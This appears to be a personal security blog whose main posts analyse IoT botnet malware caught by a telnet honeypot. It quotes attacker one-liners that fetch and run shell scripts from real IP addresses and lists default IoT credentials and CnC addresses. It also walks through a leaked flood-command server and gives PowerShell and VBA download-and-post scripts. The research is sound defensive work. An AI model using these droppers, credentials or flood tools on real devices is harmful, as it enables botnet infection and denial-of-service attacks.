Thursday, November 24, 2016

IoT Malware Analysis - CnC Server - Part 3

Through the information gathered inside of the binaries I began searching for unique strings on Google.  One of the unique strings that I searched for was "HTTPFLOOD GHP".  This pulled back less than 10 results and the first one was from the site hxxp://psbdmp.com/wT1htV9b.  This contained the source code for what they called "Palkia Server.c".


This particular piece of source code was found to have been leaked on 2016-11-12 09:58:05 according to the timestamp on the paste.  I have not validated that the binary in which I found the string matches up with this particular CnC Server source code.

After looking at the source code and understanding the logic, verifying there were no backdoors and other intents to infect my systems I compiled the source code on a temporary server.  Upon execution you need to specify which port it listens on for the bot connections and the number of threads it will utilize.


After you specify the port and the number of threads it begins to listen for clients.  If a client connects the first command that it sends is a command to the client to enable the scanning of other devices through telnet.


Then the server will keep in contact with the bot by sending the string "PING" every 60 seconds.  I have noticed that some bots will receive the communication at an interval as small as 15 seconds.


Through the source code you learn that the bot can send commands back to the server that are interpreted. 


From the source code you can see 3 commands that the bot can send back: PING, REPORT, and PONG.  If the bot sends PING then the CnC server will respond with PONG.  If the bot sends "REPORT " + up to 2048 characters it will store the sent information in a file called telnet.txt.  If PONG is sent it will do nothing but continue in the loop.  Then if anything sent to the CnC does not match these 3 commands it will output it to stdout on the CnC Server with "buf:" appended to the beginning of it.

The other side of this source code is running an administration console so the bots can be controlled.  You can see in the source code that the server by default runs on port 777.


Appears that if you connect to this port you are prompted for a username.  The username and eventually password is parsed out of a file called savage.txt.  They are formatted with username, a space, and then the password.


I created this file with a test user and then a test2 user with a respective password following.  After feeling I understood the logic of the application I compiled it and ran it on a temporary server.  This allowed me to connect with a username and password.  Then from the source code you learn you can send the command "!* HELP" and it will display a quick help screen as shown below.



From the above screenshot you can see that the Attack Commands instruct the bots to conduct UDP, TCP or HTTP floods.  The KILLATTK instructs the bots to stop the attacks that they are instructed to conduct.  As someone is in the CnC Server their commands are broadcast to the bots with exception to a few.

As commands are executed in the administration side of the server they are saved to a file called server.log.  

I have placed the source code for the palkia server on my github page for further research along with the telnet emulator and a botEmulator.

Have a Happy Thanksgiving! Enjoy the Turkey!!





Wednesday, November 16, 2016

IoT Malware Analysis - Observations and Statistics - Part 2

On the previous post that I published I utilized a python program to emulate a telnet server, captured commands that were sent to the telnet server, and then utilized those commands to research the binaries that were collected.

In this post I am going to provide information on what happened when 2 of my servers became infected with the malware, statistics on the username and password combinations used, and statistics of which IP Addresses I observed the most attempting to login to my telnet server.

The Mirai botnet gains its popularity in causing Distributed Denial of Service (DDoS) attacks.  This is exactly what happened to both of my honeypot servers that were infected.


As you can see in the above screenshot upon initial infection of the server you see the command "SCANNER ON".  This command causes the infected device to begin scanning for other IP Addresses at random to see if port 23 is open.  If the device can be reached over port 23 then a basic script of logging in, sending 3-4 commands and then the commands cause the device to become infected as described in the previous post.

After a short period of time the infected server stopped scanning, I observed the following commands come from 2 different honeypots that were infected:




The first instance sent traffic to 107.178.255.126 over UDP to port 80.  The second instance sent traffic to 72.193.246.62 over UDP to port 3074.  In the first command you notice the number 65500.  As you can see in the below image it filled the packets with 65,500 random ASCII characters and sent them to the receiving IP.



The second instance you will notice a 0.  This sent packets that were empty to the IP address.

Both instances where the infected servers were utilized I rebooted them as soon as I observed them being utilized in a denial of service attack, however that still provided me with almost 4 GB of pcap data.  To take a quick tangent, I utilized tshark to carve the pcap files.  Below are a few commands that I used:

1. "tshark -r output.pcap -T fields -e ip.src  -e ip.dst -e tcp.dstport | sort | uniq -c | sort -n > freq_analysis.txt" - This command would read the source IP Address, destination IP Addresses and the destination port then sort it, combine all of the duplicates with a count of the occurrences, and then sort the count of occurrences numerically.

2. "editcap -r read.pcap output.pcap 500-1000" - Due to the mass amounts of traffic generated as the host participated in a denial of service, I utilized editcap to pull out of the pcap packets 500-1000.  This was so I could get a sample of the packets being sent to the target involved in the denial of service.

I do publicly apologize to the 2 IP Addresses that were targeted from my honeypot.  I tried to shutdown the execution of the denial of service attack as soon as I observed it occurring.

Below are the usernames and passwords that I observed logging into my honeypot.  The first number is how many times the combination of the username and password appeared in the logs of my honeypot:

9637 root:xc3511
9567 root:vizxv
8532 root:admin
7897 admin:admin
6856 root:888888
5569 root:xmhdipc
5341 root:juantech
4927 support:support
4598 root:default
4393 root:
4321 root:anko
4268 root:123456
4100 root:54321
3668 root:root
3655 admin:password
3523 root:12345
2835 admin:
2822 admin:smcadmin
2730 admin:admin1234
2680 root:pass
2642 user:user
2476 root:hi3518
2367 root:1111
2208 root:password
2055 admin:1111
2022 root:666666
1742 root:1234
1538 guest:12345
1247 root:hunt5759
1230 root:GM8182
1201 root:dreambox
1201 root:7ujMko0vizxv
1118 admin:pass
1107 root:00000000
1102 root:Zte521
1089 root:klv1234
1088 service:service
1073 administrator:1234
1069 admin:54321
1062 root:jvbzd
1005 root:klv123
1001 admin:meinsm
991 supervisor:supervisor
987 ubnt:ubnt
967 root:7ujMko0admin
939 root:ikwb
916 admin:1111111
897 tech:tech
896 admin:4321
895 root:zlxx.
882 admin1:password
875 888888:888888
866 guest:guest
864 Administrator:meinsm
859 root:realtek
843 root:user
839 admin:1234
834 admin:123456
829 666666:666666
817 root:system
811 admin:12345
783 admin:7ujMko0admin
439 root:1001chin
357 user:qweasdzx
331 netgear:netgear
185 root:zlxx
169 admin:cat1029
168 realtek:realtek
150 telnet:telnet
98 root:5up
95 root:telnet
33 root:tl789
31 Admin:1234
23 cisco:cisco
19 root:admin@mymifi

Here are the most frequent IP Addresses and how many times a particular IP Address appeared in the logs:

   2625 110.46.206.69
   1726 211.116.216.80
   1039 113.21.230.158
    889 61.216.169.144
    696 213.109.9.79
    682 108.30.195.231
    666 176.122.98.75
    661 200.71.198.27
    626 118.194.243.82
    604 112.198.53.227
    600 110.46.13.132
    597 176.122.121.16
    596 111.177.26.210
    587 178.132.124.154
    569 116.108.236.118
    558 117.3.214.198
    531 178.255.170.86
    501 41.174.134.39
    499 14.181.187.48
    476 183.80.246.232
    475 46.100.164.100
    475 195.138.85.207
    464 109.98.11.183
    443 191.190.69.216
    432 62.83.67.39
    430 185.42.225.13
    381 213.60.130.226
    369 14.169.208.240
    365 14.167.194.168
    352 116.109.24.186
    347 89.46.4.71
    340 88.250.61.158
    337 91.219.15.100
    317 88.225.222.167
    311 177.193.110.155
    305 86.124.90.244
    300 60.186.21.124
    295 183.25.246.52
    283 82.114.90.217
    283 113.169.87.139
    281 116.102.150.187
    277 183.62.63.5
    277 14.172.254.167
    276 46.36.169.59
    276 181.23.58.164
    274 187.59.124.89
    271 203.69.196.159
    271 177.194.228.102
    268 181.44.219.236
    266 37.229.144.226
    263 27.64.30.158

I have collected a log entry from 2,654 IP Addresses so far in my research.  Understanding that some of these IP Addresses are dynamic and the party utilizing the IP changes frequently, I found that 758 were listening on port 23.  I found this to be interesting that of the IP Addresses 28.56% were listening on port 23.  I would think that this number would be above 60% of the scanned devices.  Also I found interesting that some of the IP Addresses that most frequently hit my botnet were not listening on port 23.

Also I conducted a host lookup on the 2,654 IP Addresses to see if they resolved to a reverse DNS name.  I utilized the command "host <ip address>":
1578 - Resolved to a reserve DNS name
807 - NXDOMAIN
144 - SERVFAIL
73 - Directed to localhost (Blackholed)
52 - DNS connection timed out














Tuesday, November 8, 2016

IoT Malware Analysis - Botnets being created through weak credentials... - Part 1

I became curios about the spreading IoT malware through default usernames and passwords due to multiple media articles.  So I spun up a VPS server and started using a tool created by Robert David Graham called telnetlogger.  Immediately I saw the constant barrage of traffic that was being generated.  Now the next question I had was what are the commands that are being executed on these IoT devices.

I first evaluated the source code provided on the Github site for telnetlogger to see if I wanted to re-write some of it to log the commands being sent in.  I then searched around for a honeypot that would emulate a telnet server.  Then I decided to write my own in python.  It is not perfect but it accomplishes logging up to 9 commands after a successful login.  The source code can be found on my github page.

After running this telnet emulator for less than 48 hours I had logged some interesting commands that were trying to download a shell script to then pull down additional binaries that would execute and then be removed.  Below are some of the commands that were observed in the log file called outputInfo.txt.


IP:('223.96.148.28', 61232)|U:|P:|C:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.102.56.200/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 94.102.56.200 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 94.102.56.200; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh

IP:('24.105.255.153', 48191)|U:|P:|C:cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;busybox wget http://173.208.196.202/bin.sh;sh bin.sh;busybox tftp -r bin2.sh -g 173.208.196.202;sh bin2.sh;busybox tftp -c 173.208.196.202 get bin3.sh;sh bin3.sh;busybox ftpget 173.208.196.202 bin4;sh bin4.sh;exit

IP:('27.188.253.77', 6057)|U:|P:|C:cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.142.236.215/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 185.142.236.215 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.142.236.215; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.142.236.215 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh


After pulling down the shell script using the wget command you can see the below commands being executed in a bash script.


As you can see it utilizes wget to download files that appear to be legitimate binaries that could be running on a linux server.  I also like the trick of using a space as a filename to hide it's presence.  It will then execute and then remove the binary if the script successfully executed.

I was curious why so many files were being downloaded and executed verses just having a couple.  I then used the Linux program called "file" to identify the file.  As you can see below each file is built for a different architecture.  "Leave no device behind..."



ELF 32-bit LSB  executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
ELF 32-bit LSB  executable, ARM, version 1, statically linked, not stripped
ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
ELF 32-bit LSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
ELF 32-bit LSB  executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, Motorola 68020 - invalid byte order, version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
ELF 32-bit MSB  executable, SPARC version 1 (SYSV), statically linked, not stripped
ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), statically linked, not stripped



Utilizing a utility called ssdeep you can see that most of this malware is similar but if you evaluate the SHA1 hashes of the files across more than 13 samples collected most of them were different.  Running strings on any of the binaries you can see the following:

This is an IP Address and port that has not been obfuscated.  This turns out to be the CnC servers address and port that the bot will connect to.  Also the parent registry of each IP Address will be listed.  After identifying this pattern the below command could be executed to find the CnC servers address and port in all of the binaries.  I will continue to update the below table as more CnC servers are found.



strings * | egrep -e "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[0-9]{2,5}" | sort | uniq -c | sort -nr

     64 192.156.82.47:666 ARIN (Observed on 11/21, 11/22, 11/23, 11/24)
     44 5.79.109.170:550 RIPE  (Observed on 11/19, 11/21, 11/22, 11/24)
     30 23.94.47.57:873 ARIN (Observed on 11/7, 11/9, 11/16, 11/19)
     24 208.67.1.120:5630 ARIN (Observed on 11/6, 11/9)
     24 89.248.161.2:5888 RIPE (Observed on 11/22, 11/23, 11/24)
     22 50.115.166.166:23 ARIN (Observed on 11/19)
     22 93.158.200.94:1 RIPE (Observed on 11/21, 11/22)
     16 149.7.102.155:666 ARIN (Observed on 11/19, 11/20)
     12 208.67.1.62:31293 ARIN (Observed on 11/19)
     12 208.67.1.65:23 ARIN (Observed on 11/20)
     12 158.69.211.33:443 ARIN (Observed on 11/21, 11/24)
     11 103.194.169.254:5888 APNIC (Observed on 11/6)
     11 45.76.22.164:23 ARIN (Observed on 11/7)
     11 69.30.233.142:23 ARIN (Observed on 11/7)
     11 69.30.214.158:666 ARIN (Observed on 11/8)
     11 198.23.150.37:23 ARIN (Observed on 11/19)
     11 198.144.181.8:5050 ARIN (Observed on 11/19)
     11 107.178.96.71:23 ARIN (Observed on 11/22)
     11 50.115.160.131:23 ARIN (Observed on 11/23)
     11 185.142.236.227:23 RIPE (Observed on 11/24)
     10 198.167.140.12:23 ARIN (Observed on 11/22)
      9 107.178.96.101:443 ARIN (Observed on 11/19)
      8 176.126.246.239:5888 RIPE (Observed on 11/21)
      2 112.124.3.121:7373 APNIC (Observed on 11/6)


The command returned the number of occurrences among the binaries that I had collected and the CnC IP Address and port.  I was curious of the communication channel that was used if the binary was executed.

With one of the x86 binaries I spun up another VPS and while running tcpdump I executed the binary.  I was expecting to observe in the packet captures a connection to an IRC channel however it connected using more of a raw connection.  I saw this behavior after infecting a couple of the VPS servers with the malware.

This is just a quick initial analysis of how the malware is spreading, propagating, executing, and communicating with it's CnC servers.  The infected devices obviously are being utilized to cause DDoS attacks and other activities of the miscreants wishes.  Also with the variety of hashes that are available with each unique variant a traditional signature based solution would be inefficient to filter this activity.  More to come but will wrap this up...

The information contained in this post is for educational purposes.  Enjoy...



Tuesday, October 18, 2016

Powershell - Scripts to Download and Save a File AND POST Data to a Web Page

Recently I created a couple of simple Powershell scripts to download and save a file and then send a POST Request to a Site.  Below are the scripts that I created.

$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")       
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
$response = $wc.DownloadString("http://blah.com/master.txt")
Set-Content -Value $response -Path $env:APPDATA\Microsoft\output.txt

---

$encodedData = "b3V0Ym91bmQ%3d"

$params = New-Object System.Collections.Specialized.NameValueCollection
$params.Add('poster','blah55')
$params.Add('syntax','text')
$params.Add('content',$encodedData)

$wc = New-Object System.Net.WebClient
$wc.Headers.Add("User-Agent","IE6")       
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

for ($i=1; $i -le 50; $i++)
{
                $response = $wc.UploadValues($url, "POST", $params)
                $decoded = [System.Text.Encoding]::UTF8.GetString($response)
                Set-Content -Value $decoded -Path $env:APPDATA\Microsoft\post.txt
                start-sleep -seconds 600
}

$j=1

VBA - Script to Download a file from a URL

Below is a Visual Basic for Applications script I quickly build to download a file through a Macro to the computer.  This was to test the capability of being able to do it and finding a way to prevent it from occurring.

Sub dFile()
'
' vTest Macro
'
'
Dim myURL As String
dURL = "http://blah/text.zip"

Dim WinHttpReq As Object
Dim fileName As String

fileName = Environ("AppData") & "\microsoft\text.zip"
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", dURL
WinHttpReq.send

If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject("ADODB.Stream")
    oStream.Open
    oStream.Type = 1
    oStream.Write WinHttpReq.responseBody
    oStream.SaveToFile fileName, 2
    oStream.Close
End If

End Sub

Python - Script to Send an Email through Gmail

Below is a python script that I was using to send an email through a gmail account:

#!/usr/bin/python

import smtplib

fromAddress='email@gmail.com'
toAddress='ltrappett@gmail.com'

msg='To another email address.'

username='email@gmail.com'
password='specific use password'

server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
server.sendmail(fromAddress, toAddress, msg)
server.quit()

iptables - Setup for a home router with 3 vlans

I began to create a home router with 2 NICs.  The first NIC is for the WAN and then the second NIC is for the LAN.  The LAN NIC is then split up with 3 vlans.  The vlans are serving the purposes of the first being for a Wireless LAN, second being the Wired LAN and the third being an Untrusted Network for testing and whatever else.  The NIC does plug into a switch that is then VLANed respectively also.  My purpose of posting it is to show how it could be done and understand it is probably not without bugs.

The main reason I am creating the 3 vlans is to separate out and monitor the IoT devices that are starting to accumulate in my house and separate my testing lab from everything else due to the malware that I sometimes will detonate in it.

Below is the configuration of the /etc/network/interfaces file to establish the vlans.  After that configuration is what I started with to built out iptables for each environment.  I am also running a caching bind9 server and plan to setup squid for a transparent web proxy.  With the logs that are generated I intend on feeding them into a SIEM.  I am in debate of using AlienVault OSSIM, Splunk Light, ELK or one of many others...

## /etc/network/interfaces ##
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.20.5.254
netmask 255.255.255.0
network 172.20.5.0
broadcast 172.20.5.255
gateway 172.20.5.1
# dns-* options are implemented by the resolvconf package, if installed
dns-nameservers 172.20.5.1
dns-search thepcn3rd.local

# Native Network
auto eth1
iface eth1 inet static
address 10.0.0.1
netmask 255.255.255.0
network 10.0.0.0
broadcast 10.0.0.255
dns-nameservers 10.0.0.1
dns-search my.local

# Wireless Network
auto eth1.10
iface eth1.10 inet static
address 10.10.0.1
netmask 255.255.255.0
network 10.10.0.0
broadcast 10.10.0.255
dns-nameservers 10.10.0.1
dns-search wireless.local
vlan-raw-device eth1

# Wired Network
auto eth1.20
iface eth1.20 inet static
address 10.20.0.1
netmask 255.255.255.0
network 10.20.0.0
broadcast 10.20.0.255
dns-nameservers 10.20.0.1
dns-search wired.local
vlan-raw-device eth1

# Untrusted Network
auto eth1.30
iface eth1.30 inet static
address 10.30.0.1
netmask 255.255.255.0
network 10.30.0.0
broadcast 10.30.0.255
dns-nameservers 10.30.0.1
dns-search blue.local
vlan-raw-device eth1

## iptables ##
iptables -F
iptables -t nat -F
iptables -X
iptables -Z

iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP

iptables -N WAN_ACCEPT
iptables -N LAN_ACCEPT
iptables -N LOG_FORWARD_ACCEPT
iptables -N WAN_OUTPUT_DROP
iptables -N LAN_OUTPUT_DROP
iptables -N WAN_INPUT_DROP
iptables -N LAN_INPUT_DROP
iptables -N FORWARD_DROP

iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
#iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

################################## Allow incoming to eth0 #####
# Comcast LAN to eth0 Router WAN
# SSH
iptables -A INPUT -i eth0 -p tcp -s 172.20.5.0/24 -d 172.20.5.254 --dport 22 -m state --state NEW,ESTABLISHED -j WAN_ACCEPT
iptables -A OUTPUT -o eth0 -p tcp -s 172.20.5.254 -d 172.20.5.0/24 --sport 22 -m state --state ESTABLISHED -j WAN_ACCEPT

################################## Allow incoming to eth1.20 #####
# eth1.20 Wired LAN to eth0 Router LAN
# SSH TCP/22 from LAN to 10.20.0.1
iptables -A INPUT -i eth1.20 -p tcp -s 10.20.0.0/24 -d 10.20.0.1 --dport 22 -m state --state NEW,ESTABLISHED -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.20 -p tcp -s 10.20.0.1 -d 10.20.0.0/24 --sport 22 -m state --state ESTABLISHED -j LAN_ACCEPT
# DNS UDP/53 from LAN to 10.10.0.1, 10.20.0.1 and 10.30.0.1
iptables -A INPUT -i eth1.10 -p udp -s 10.10.0.0/24 -d 10.10.0.1 --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth1.10 -p udp -s 10.10.0.1 -d 10.10.0.0/24 --sport 53 -j ACCEPT
iptables -A INPUT -i eth1.20 -p udp -s 10.20.0.0/24 -d 10.20.0.1 --dport 53 -j ACCEPT
iptables -A OUTPUT -o eth1.20 -p udp -s 10.20.0.1 -d 10.20.0.0/24 --sport 53 -j ACCEPT
iptables -A INPUT -i eth1.30 -p udp -s 10.30.0.0/24 -d 10.30.0.1 --dport 53 -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.30 -p udp -s 10.30.0.1 -d 10.30.0.0/24 --sport 53 -j LAN_ACCEPT
# DHCP UDP/67 from LAN to 10.10.0.1, 10.20.0.1, 10.30.0.1
iptables -A INPUT -i eth1.10 -p udp -s 10.10.0.0/24 -d 10.10.0.1 --dport 67 -j ACCEPT
iptables -A OUTPUT -o eth1.10 -p udp -s 10.10.0.1 -d 10.10.0.0/24 --sport 67 -j ACCEPT
iptables -A INPUT -i eth1.20 -p udp -s 10.20.0.0/24 -d 10.20.0.1 --dport 67 -j ACCEPT
iptables -A OUTPUT -o eth1.20 -p udp -s 10.20.0.1 -d 10.20.0.0/24 --sport 67 -j ACCEPT
iptables -A INPUT -i eth1.30 -p udp -s 10.30.0.0/24 -d 10.30.0.1 --dport 67 -j LAN_ACCEPT
iptables -A OUTPUT -o eth1.30 -p udp -s 10.30.0.1 -d 10.30.0.0/24 --sport 67 -j LAN_ACCEPT

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Forward eth1.10 to eth0 and back
iptables -A FORWARD -i eth1.10 -o eth0 -p udp -s 10.10.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p udp -d 10.10.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.10 -o eth0 -p tcp -s 10.10.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p tcp -d 10.10.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.10 -o eth0 -p tcp -s 10.10.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.10 -p tcp -d 10.10.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT

# Forward eth1.20 to eth0 and back
iptables -A FORWARD -i eth1.20 -o eth0 -p udp -s 10.20.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p udp -d 10.20.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.20 -o eth0 -p tcp -s 10.20.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p tcp -d 10.20.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.20 -o eth0 -p tcp -s 10.20.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.20 -p tcp -d 10.20.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT

# Forward eth1.30 to eth0 and back
iptables -A FORWARD -i eth1.30 -o eth0 -p udp -s 10.30.0.0/24 -d 75.75.75.75 --dport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p udp -d 10.30.0.0/24 -s 75.75.75.75 --sport 53 -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.30 -o eth0 -p tcp -s 10.30.0.0/24 --dport 80 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p tcp -d 10.30.0.0/24 --sport 80 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth1.30 -o eth0 -p tcp -s 10.30.0.0/24 --dport 443 -m state --state NEW,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -i eth0 -o eth1.30 -p tcp -d 10.30.0.0/24 --sport 443 -m state --state RELATED,ESTABLISHED -j LOG_FORWARD_ACCEPT
iptables -A FORWARD -j FORWARD_DROP

# Output from eth0 to WAN
# DNS to 75.75.75.75 or root servers
iptables -A OUTPUT -o eth0 -p udp -s 172.20.5.254 -d 75.75.75.75 --dport 53 -j LAN_ACCEPT
iptables -A INPUT -i eth0 -p udp -d 172.20.5.254 -s 75.75.75.75 --sport 53 -j LAN_ACCEPT

#iptables -N LOGGING
#iptables -A INPUT -j LOGGING
#iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTABLES: " --log-level 7
#iptables -A LOGGING -j DROP

iptables -A WAN_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "WAN-ACCEPT " --log-level 6
iptables -A WAN_ACCEPT -j ACCEPT 

iptables -A LAN_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "LAN-ACCEPT " --log-level 6
iptables -A LAN_ACCEPT -j ACCEPT 

iptables -A LOG_FORWARD_ACCEPT -m limit --limit 2/min -j LOG --log-prefix "FORWARD-ACCEPT " --log-level 6
iptables -A LOG_FORWARD_ACCEPT -j ACCEPT 

iptables -A INPUT -i eth0 -j WAN_INPUT_DROP
iptables -A INPUT -i eth1.10 -j LAN_INPUT_DROP
iptables -A INPUT -i eth1.20 -j LAN_INPUT_DROP
iptables -A INPUT -i eth1.30 -j LAN_INPUT_DROP

iptables -A OUTPUT -o eth0 -j WAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.10 -j LAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.20 -j LAN_OUTPUT_DROP
iptables -A OUTPUT -o eth1.30 -j LAN_OUTPUT_DROP

iptables -A WAN_INPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "WAN_INPUT_DROP " --log-level 6
iptables -A WAN_INPUT_DROP -j DROP 

iptables -A WAN_OUTPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "WAN_OUTPUT_DROP " --log-level 6
iptables -A WAN_OUTPUT_DROP -j DROP 

iptables -A LAN_INPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "LAN_INPUT_DROP " --log-level 6
iptables -A LAN_INPUT_DROP -j DROP

iptables -A LAN_OUTPUT_DROP -m limit --limit 2/min -j LOG --log-prefix "LAN_OUTPUT_DROP " --log-level 6
iptables -A LAN_OUTPUT_DROP -j DROP

iptables -A FORWARD_DROP -m limit --limit 2/min -j LOG --log-prefix "FORWARD_DROP " --log-level 6
iptables -A FORWARD_DROP -j DROP

Sunday, March 13, 2016

Weevely - PHP Backdoor

Recently at BSides SLC 2016 I had a class which introduced the usage of Weevely.  Here are a couple of links that complemented the training that I had:

http://exploiterz.blogspot.com/2013/09/how-to-backdoor-webserver-using-weevely.html

http://null-byte.wonderhowto.com/forum/hiob-generate-web-backdoors-php-using-weevely-kali-linux-0158905/

Saturday, March 12, 2016

Simple Script to Configure iptables

I have been utilizing Cloud at Cost to put together a variety of labs.  I build the below iptables script to configure it for a base installation until I can configure it further.





#!/bin/bash

allowedTCPInbound="22"
#allowedUDPInbound="53"

iptables -F
iptables -X
iptables -Z

iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT

iptables -A INPUT -s 127.0.0.1 -j ACCEPT
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

for port in $allowedTCPInbound; do
 #iptables -A INPUT -p tcp --dport $port -j LOG --log-prefix '*** Allowed TCP Connection ***'
 iptables -A INPUT -p tcp --dport $port -j ACCEPT
done

#for port in $allowedUDPInbound; do
# iptables -A INPUT -p udp --dport $port -j LOG --log-prefix '*** Allowed UDP Connection ***'
# iptables -A INPUT -p udp --dport $port -j ACCEPT
#done

iptables -A INPUT -p udp --dport 67 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS
iptables -A INPUT -p udp --dport 137 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS
iptables -A INPUT -p udp --dport 138 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p tcp --dport 139 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p tcp --dport 445 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p udp --dport 9181 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - NetBIOS 
iptables -A INPUT -p udp --dport 17500 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast
iptables -A INPUT -p udp --dport 32412 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - Plex Server UDP Discover Devices
iptables -A INPUT -p udp --dport 32414 -j DROP   # Added this due to the amount of traffic that is generated from this broadcast - Plex Server UDP Discover Devices

iptables -A INPUT -p tcp -j LOG --log-prefix '*** DROP TCP Connection ***'
iptables -A INPUT -p udp -j LOG --log-prefix '*** DROP UDP Connection ***'
iptables -A INPUT -p icmp -j LOG --log-prefix '*** DROP ICMP Connection ***'




You can also download it from here.

BSides 2016 Hackers Challenge

At BSides 2016 I participated in their Hackers Challenge.  The challenges were based on reverse engineering, network packet analysis, and many other puzzles that you needed to figure out.  When I had hit the wall at 3AM in the morning on March 11th I was in 2nd place.  By the end of the competition which was at 10AM I had dropped to 7th.  The challenge was great! Thanks BSides...

Check-out the django.nV project.  This is a project that was used in the Hackers Challenge but was adapted from its original state.

Screenshot of being in 2nd place at 3AM.


Screenshot of being in 7th place at the end of the competition.



One thing to note is most of the challenges were worth 4,000 points in the beginning.  If you did the challenge and no-one else you kept the 4,000 points.  For each participant that accomplished the challenge you had to divide the points with them.

Responsible Disclosure of CSRF in PHP Fusion 9

Recently I did some testing with PHP Fusion 9 and found that I could create additional users as the admin is logged in due to the application not protecting against CSRF.  I reached out to the development team and they had it fixed within 72 hours.  Below is the original video that I sent them and then they provided one back showing they had fixed it and to test it again.

Video - Adding a user account through CSRF




Then here is the response about fixing the vulnerability in version 9.
Here is the youtube video that he posted as shown above in the screenshot:  https://www.youtube.com/watch?v=5eLfA_ZEujQ&feature=youtu.be



Forensics - Mount Windows Partition Showing the System Files

Mount a windows partition showing the system files:
mount -o ro,show_sys_files,streams_interface=windows /dev/sdb2 /mnt/analysis

